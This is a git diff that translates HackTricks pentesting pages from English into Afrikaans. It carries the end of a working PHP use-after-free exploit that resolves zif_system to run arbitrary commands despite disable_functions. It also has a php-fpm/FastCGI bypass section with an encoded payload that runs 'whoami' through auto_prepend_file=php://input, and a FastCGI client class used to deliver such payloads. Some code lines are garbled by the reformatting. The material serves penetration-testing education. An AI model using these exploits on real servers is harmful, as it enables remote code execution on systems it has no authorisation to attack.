-    if(strlen($abc) == 79 || strlen($abc) == 0) {
-        die("UAF failed");
-    }
+if(strlen($abc) == 79 || strlen($abc) == 0) {
+die("UAF failed");
+}
 
-    # leaks
-    $closure_handlers = str2ptr($abc, 0);
-    $php_heap = str2ptr($abc, 0x58);
-    $abc_addr = $php_heap - 0xc8;
+# leaks
+$closure_handlers = str2ptr($abc, 0);
+$php_heap = str2ptr($abc, 0x58);
+$abc_addr = $php_heap - 0xc8;
 
-    # fake value
-    write($abc, 0x60, 2);
-    write($abc, 0x70, 6);
+# fake value
+write($abc, 0x60, 2);
+write($abc, 0x70, 6);
 
-    # fake reference
-    write($abc, 0x10, $abc_addr + 0x60);
-    write($abc, 0x18, 0xa);
+# fake reference
+write($abc, 0x10, $abc_addr + 0x60);
+write($abc, 0x18, 0xa);
 
-    $closure_obj = str2ptr($abc, 0x20);
+$closure_obj = str2ptr($abc, 0x20);
 
-    $binary_leak = leak($closure_handlers, 8);
-    if(!($base = get_binary_base($binary_leak))) {
-        die("Couldn't determine binary base address");
-    }
+$binary_leak = leak($closure_handlers, 8);
+if(!($base = get_binary_base($binary_leak))) {
+die("Couldn't determine binary base address");
+}
 
-    if(!($elf = parse_elf($base))) {
-        die("Couldn't parse ELF header");
-    }
+if(!($elf = parse_elf($base))) {
+die("Couldn't parse ELF header");
+}
 
-    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
-        die("Couldn't get basic_functions address");
-    }
+if(!($basic_funcs = get_basic_funcs($base, $elf))) {
+die("Couldn't get basic_functions address");
+}
 
-    if(!($zif_system = get_system($basic_funcs))) {
-        die("Couldn't get zif_system address");
-    }
+if(!($zif_system = get_system($basic_funcs))) {
+die("Couldn't get zif_system address");
+}
 
-    # fake closure object
-    $fake_obj_offset = 0xd0;
-    for($i = 0; $i < 0x110; $i += 8) {
-        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
-    }
+# fake closure object
+$fake_obj_offset = 0xd0;
+for($i = 0; $i < 0x110; $i += 8) {
+write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
+}
 
-    # pwn
-    write($abc, 0x20, $abc_addr + $fake_obj_offset);
-    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
-    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
+# pwn
+write($abc, 0x20, $abc_addr + $fake_obj_offset);
+write($abc, 0xd0 + 0x38, 1, 4); # internal func type
+write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
 
-    ($helper->b)($cmd);
-    exit();
+($helper->b)($cmd);
+exit();
 }
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
index c4a2e3772..3d21ec528 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
@@ -1,390 +1,387 @@
-# disable\_functions bypass - php-fpm/FastCGI
+# disable\_functions omseil - php-fpm/FastCGI
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 ## PHP-FPM
 
-**PHP-FPM** is presented as a **superior alternative** to the standard PHP FastCGI, offering features that are particularly **beneficial for websites with high traffic**. It operates through a master process that oversees a collection of worker processes. For a PHP script request, it's the web server that initiates a **FastCGI proxy connection to the PHP-FPM service**. This service has the capability to **receive requests either via network ports on the server or Unix sockets**.
+**PHP-FPM** word voorgestel as 'n **betere alternatief** vir die standaard PHP FastCGI, met funksies wat veral **voordeel kan bied vir webwerwe met hoë verkeer**. Dit werk deur middel van 'n meesterproses wat 'n versameling werkerprosesse oorsien. Vir 'n PHP-skripsieversoek is dit die webbediener wat 'n **FastCGI-proksiverbinding na die PHP-FPM-diens** inisieer. Hierdie diens het die vermoë om versoek te **ontvang via netwerkpoorte op die bediener of Unix-aansluitings**.
 
-Despite the intermediary role of the proxy connection, PHP-FPM needs to be operational on the same machine as the web server. The connection it uses, while proxy-based, differs from conventional proxy connections. Upon receiving a request, an available worker from PHP-FPM processes it—executing the PHP script and then forwarding the results back to the web server. After a worker concludes processing a request, it becomes available again for upcoming requests.
+Ten spyte van die bemiddelende rol van die proksiverbinding, moet PHP-FPM bedryfsklaar wees op dieselfde masjien as die webbediener. Die verbinding wat dit gebruik, alhoewel proksigebaseerd, verskil van konvensionele proksiverbindings. Wanneer 'n versoek ontvang word, verwerk 'n beskikbare werker van PHP-FPM dit - voer die PHP-skripsie uit en stuur dan die resultate terug na die webbediener. Nadat 'n werker 'n versoek voltooi het, word dit weer beskikbaar vir komende versoek.
 
-## But what is CGI and FastCGI?
+## Maar wat is CGI en FastCGI?
 
 ### CGI
 
-Normally web pages, files and all of the documents which are transferred from the web server to the browser are stored in a specific public directory such as home/user/public\_html. **When the browser requests certain content, the server checks this directory and sends the required file to the browse**r.
+Normaalweg word webbladsye, lêers en al die dokumente wat van die webbediener na die blaaier oorgedra word, gestoor in 'n spesifieke openbare gids soos home/gebruiker/public\_html. **Wanneer die blaaier sekere inhoud aanvra, kontroleer die bediener hierdie gids en stuur die vereiste lêer na die blaaier**.
 
-If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public\_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.
+As **CGI** op die bediener geïnstalleer is, word die spesifieke cgi-bin-gids ook daarby gevoeg, byvoorbeeld home/gebruiker/public\_html/cgi-bin. CGI-skripsies word in hierdie gids gestoor. **Elke lêer in die gids word behandel as 'n uitvoerbare program**. Wanneer 'n skripsie vanuit die gids benader word, stuur die bediener 'n versoek na die toepassing wat verantwoordelik is vir hierdie skripsie, in plaas daarvan om die inhoud van die lêer na die blaaier te stuur. **Nadat die invoerdata verwerking voltooi is, stuur die toepassing die uitvoerdata** na die webbediener wat die data na die HTTP-kliënt stuur.
 
-For example, when the CGI script [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/\*\*cgi-bin/file.pl\*\*) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html))
+Byvoorbeeld, wanneer die CGI-skripsie [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/\*\*cgi-bin/file.pl\*\*) benader word, sal die bediener die toepaslike Perl-toepassing deur CGI laat loop. Die data wat gegenereer word deur die uitvoering van die skripsie, sal deur die toepassing na die webbediener gestuur word. Die bediener sal op sy beurt die data na die blaaier oordra. As die bediener nie CGI gehad het nie, sou die blaaier die **.pl**-lêerkode self vertoon het. (verduideliking van [hier](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html))
 
 ### FastCGI
 
-[FastCGI](https://en.wikipedia.org/wiki/FastCGI) is a newer web technology, an improved [CGI](http://en.wikipedia.org/wiki/Common\_Gateway\_Interface) version as the main functionality remains the same.
+[FastCGI](https://en.wikipedia.org/wiki/FastCGI) is 'n nuwer webtegnologie, 'n verbeterde weergawe van [CGI](http://en.wikipedia.org/wiki/Common\_Gateway\_Interface) waarvan die hooffunksionaliteit dieselfde bly.
 
-The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open\_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.**
+Die behoefte om FastCGI te ontwikkel, is ontstaan deur die vinnige ontwikkeling en kompleksiteit van toepassings in die Web, asook om die skaalbaarheidstekortkominge van CGI-tegnologie aan te spreek. Om aan hierdie vereistes te voldoen, het [Open Market](http://en.wikipedia.org/wiki/Open\_Market) **FastCGI - 'n hoë prestasie weergawe van die CGI-tegnologie met verbeterde vermoëns -** bekendgestel.
 
-## disable\_functions bypass
+## disable\_functions omseil
 
-It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations.
+Dit is moontlik om PHP-kode uit te voer deur die FastCGI te misbruik en die beperkings van `disable_functions` te omseil.
 
 ### Via Gopherus
 
 {% hint style="danger" %}
-I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via \[**PEASS & HackTricks telegram group here**]\([**https://t.me/peass**](https://t.me/peass)), or twitter \[**@carlospolopm**]\([**https://twitter.com/hacktricks_live**](https://twitter.com/hacktricks_live))**.**
+Ek is nie seker of dit werk in moderne weergawes nie, omdat ek dit een keer probeer het en dit het niks uitgevoer nie. Asseblief, as jy meer inligting hieroor het, kontak my via \[**PEASS & HackTricks telegram-groep hier**]\([**https://t.me/peass**](https://t.me/peass)), of twitter \[**@carlospolopm**]\([**https://twitter.com/hacktricks_live**](https://twitter.com/hacktricks_live))**.**
 {% endhint %}
 
-Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
+Met behulp van [Gopherus](https://github.com/tarunkant/Gopherus) kan jy 'n nutslading genereer om na die FastCGI-luisteraar te stuur en arbitrêre opdragte uit te voer:
 
 ![](<../../../../.gitbook/assets/image (351).png>)
-
-Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). And then copy/pasting the abse64 in this php code:
-
+Dan kan jy die urlencoded payload gryp en dit dekodeer en omskakel na base64, \[**deur hierdie resep van cyberchef byvoorbeeld te gebruik**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). En dan kopieer/plak die base64 in hierdie php-kode:
 ```php
 
- * @version     1.0
- */
+* Handles communication with a FastCGI application
+*
+* @author      Pierrick Charron 
+* @version     1.0
+*/
 class FCGIClient
 {
-    const VERSION_1            = 1;
-    const BEGIN_REQUEST        = 1;
-    const ABORT_REQUEST        = 2;
-    const END_REQUEST          = 3;
-    const PARAMS               = 4;
-    const STDIN                = 5;
-    const STDOUT               = 6;
-    const STDERR               = 7;
-    const DATA                 = 8;
-    const GET_VALUES           = 9;
-    const GET_VALUES_RESULT    = 10;
-    const UNKNOWN_TYPE         = 11;
-    const MAXTYPE              = self::UNKNOWN_TYPE;
-    const RESPONDER            = 1;
-    const AUTHORIZER           = 2;
-    const FILTER               = 3;
-    const REQUEST_COMPLETE     = 0;
-    const CANT_MPX_CONN        = 1;
-    const OVERLOADED           = 2;
-    const UNKNOWN_ROLE         = 3;
-    const MAX_CONNS            = 'MAX_CONNS';
-    const MAX_REQS             = 'MAX_REQS';
-    const MPXS_CONNS           = 'MPXS_CONNS';
-    const HEADER_LEN           = 8;
-    /**
-     * Socket
-     * @var Resource
-     */
-    private $_sock = null;
-    /**
-     * Host
-     * @var String
-     */
-    private $_host = null;
-    /**
-     * Port
-     * @var Integer
-     */
-    private $_port = null;
-    /**
-     * Keep Alive
-     * @var Boolean
-     */
-    private $_keepAlive = false;
-    /**
-     * Constructor
-     *
-     * @param String $host Host of the FastCGI application
-     * @param Integer $port Port of the FastCGI application
-     */
-    public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
-    {
-        $this->_host = $host;
-        $this->_port = $port;
-    }
-    /**
-     * Define whether or not the FastCGI application should keep the connection
-     * alive at the end of a request
-     *
-     * @param Boolean $b true if the connection should stay alive, false otherwise
-     */
-    public function setKeepAlive($b)
-    {
-        $this->_keepAlive = (boolean)$b;
-        if (!$this->_keepAlive && $this->_sock) {
-            fclose($this->_sock);
-        }
-    }
-    /**
-     * Get the keep alive status
-     *
-     * @return Boolean true if the connection should stay alive, false otherwise
-     */
-    public function getKeepAlive()
-    {
-        return $this->_keepAlive;
-    }
-    /**
-     * Create a connection to the FastCGI application
-     */
-    private function connect()
-    {
-        if (!$this->_sock) {
-            //$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
-            $this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
-            if (!$this->_sock) {
-                throw new Exception('Unable to connect to FastCGI application');
-            }
-        }
-    }
-    /**
-     * Build a FastCGI packet
-     *
-     * @param Integer $type Type of the packet
-     * @param String $content Content of the packet
-     * @param Integer $requestId RequestId
-     */
-    private function buildPacket($type, $content, $requestId = 1)
-    {
-        $clen = strlen($content);
-        return chr(self::VERSION_1)         /* version */
-            . chr($type)                    /* type */
-            . chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
-            . chr($requestId & 0xFF)        /* requestIdB0 */
-            . chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
-            . chr($clen & 0xFF)             /* contentLengthB0 */
-            . chr(0)                        /* paddingLength */
-            . chr(0)                        /* reserved */
-            . $content;                     /* content */
-    }
-    /**
-     * Build an FastCGI Name value pair
-     *
-     * @param String $name Name
-     * @param String $value Value
-     * @return String FastCGI Name value pair
-     */
-    private function buildNvpair($name, $value)
-    {
-        $nlen = strlen($name);
-        $vlen = strlen($value);
-        if ($nlen < 128) {
-            /* nameLengthB0 */
-            $nvpair = chr($nlen);
-        } else {
-            /* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
-            $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
-        }
-        if ($vlen < 128) {
-            /* valueLengthB0 */
-            $nvpair .= chr($vlen);
-        } else {
-            /* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
-            $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
-        }
-        /* nameData & valueData */
-        return $nvpair . $name . $value;
-    }
-    /**
-     * Read a set of FastCGI Name value pairs
-     *
-     * @param String $data Data containing the set of FastCGI NVPair
-     * @return array of NVPair
-     */
-    private function readNvpair($data, $length = null)
-    {
-        $array = array();
-        if ($length === null) {
-            $length = strlen($data);
-        }
-        $p = 0;
-        while ($p != $length) {
-            $nlen = ord($data{$p++});
-            if ($nlen >= 128) {
-                $nlen = ($nlen & 0x7F << 24);
-                $nlen |= (ord($data{$p++}) << 16);
-                $nlen |= (ord($data{$p++}) << 8);
-                $nlen |= (ord($data{$p++}));
-            }
-            $vlen = ord($data{$p++});
-            if ($vlen >= 128) {
-                $vlen = ($nlen & 0x7F << 24);
-                $vlen |= (ord($data{$p++}) << 16);
-                $vlen |= (ord($data{$p++}) << 8);
-                $vlen |= (ord($data{$p++}));
-            }
-            $array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
-            $p += ($nlen + $vlen);
-        }
-        return $array;
-    }
-    /**
-     * Decode a FastCGI Packet
-     *
-     * @param String $data String containing all the packet
-     * @return array
-     */
-    private function decodePacketHeader($data)
-    {
-        $ret = array();
-        $ret['version']       = ord($data{0});
-        $ret['type']          = ord($data{1});
-        $ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
-        $ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
-        $ret['paddingLength'] = ord($data{6});
-        $ret['reserved']      = ord($data{7});
-        return $ret;
-    }
-    /**
-     * Read a FastCGI Packet
-     *
-     * @return array
-     */
-    private function readPacket()
-    {
-        if ($packet = fread($this->_sock, self::HEADER_LEN)) {
-            $resp = $this->decodePacketHeader($packet);
-            $resp['content'] = '';
-            if ($resp['contentLength']) {
-                $len  = $resp['contentLength'];
-                while ($len && $buf=fread($this->_sock, $len)) {
-                    $len -= strlen($buf);
-                    $resp['content'] .= $buf;
-                }
-            }
-            if ($resp['paddingLength']) {
-                $buf=fread($this->_sock, $resp['paddingLength']);
-            }
-            return $resp;
-        } else {
-            return false;
-        }
-    }
-    /**
-     * Get Informations on the FastCGI application
-     *
-     * @param array $requestedInfo information to retrieve
-     * @return array
-     */
-    public function getValues(array $requestedInfo)
-    {
-        $this->connect();
-        $request = '';
-        foreach ($requestedInfo as $info) {
-            $request .= $this->buildNvpair($info, '');
-        }
-        fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
-        $resp = $this->readPacket();
-        if ($resp['type'] == self::GET_VALUES_RESULT) {
-            return $this->readNvpair($resp['content'], $resp['length']);
-        } else {
-            throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
-        }
-    }
-    /**
-     * Execute a request to the FastCGI application
-     *
-     * @param array $params Array of parameters
-     * @param String $stdin Content
-     * @return String
-     */
-    public function request(array $params, $stdin)
-    {
-        $response = '';
-        $this->connect();
-        $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
-        $paramsRequest = '';
-        foreach ($params as $key => $value) {
-            $paramsRequest .= $this->buildNvpair($key, $value);
-        }
-        if ($paramsRequest) {
-            $request .= $this->buildPacket(self::PARAMS, $paramsRequest);
-        }
-        $request .= $this->buildPacket(self::PARAMS, '');
-        if ($stdin) {
-            $request .= $this->buildPacket(self::STDIN, $stdin);
-        }
-        $request .= $this->buildPacket(self::STDIN, '');
-        fwrite($this->_sock, $request);
-        do {
-            $resp = $this->readPacket();
-            if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
-                $response .= $resp['content'];
-            }
-        } while ($resp && $resp['type'] != self::END_REQUEST);
-        var_dump($resp);
-        if (!is_array($resp)) {
-            throw new Exception('Bad request');
-        }
-        switch (ord($resp['content']{4})) {
-            case self::CANT_MPX_CONN:
-                throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
-                break;
-            case self::OVERLOADED:
-                throw new Exception('New request rejected; too busy [OVERLOADED]');
-                break;
-            case self::UNKNOWN_ROLE:
-                throw new Exception('Role value not known [UNKNOWN_ROLE]');
-                break;
-            case self::REQUEST_COMPLETE:
-                return $response;
-        }
-    }
+const VERSION_1            = 1;
+const BEGIN_REQUEST        = 1;
+const ABORT_REQUEST        = 2;
+const END_REQUEST          = 3;
+const PARAMS               = 4;
+const STDIN                = 5;
+const STDOUT               = 6;
+const STDERR               = 7;
+const DATA                 = 8;
+const GET_VALUES           = 9;
+const GET_VALUES_RESULT    = 10;
+const UNKNOWN_TYPE         = 11;
+const MAXTYPE              = self::UNKNOWN_TYPE;
+const RESPONDER            = 1;
+const AUTHORIZER           = 2;
+const FILTER               = 3;
+const REQUEST_COMPLETE     = 0;
+const CANT_MPX_CONN        = 1;
+const OVERLOADED           = 2;
+const UNKNOWN_ROLE         = 3;
+const MAX_CONNS            = 'MAX_CONNS';
+const MAX_REQS             = 'MAX_REQS';
+const MPXS_CONNS           = 'MPXS_CONNS';
+const HEADER_LEN           = 8;
+/**
+* Socket
+* @var Resource
+*/
+private $_sock = null;
+/**
+* Host
+* @var String
+*/
+private $_host = null;
+/**
+* Port
+* @var Integer
+*/
+private $_port = null;
+/**
+* Keep Alive
+* @var Boolean
+*/
+private $_keepAlive = false;
+/**
+* Constructor
+*
+* @param String $host Host of the FastCGI application
+* @param Integer $port Port of the FastCGI application
+*/
+public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
+{
+$this->_host = $host;
+$this->_port = $port;
+}
+/**
+* Define whether or not the FastCGI application should keep the connection
+* alive at the end of a request
+*
+* @param Boolean $b true if the connection should stay alive, false otherwise
+*/
+public function setKeepAlive($b)
+{
+$this->_keepAlive = (boolean)$b;
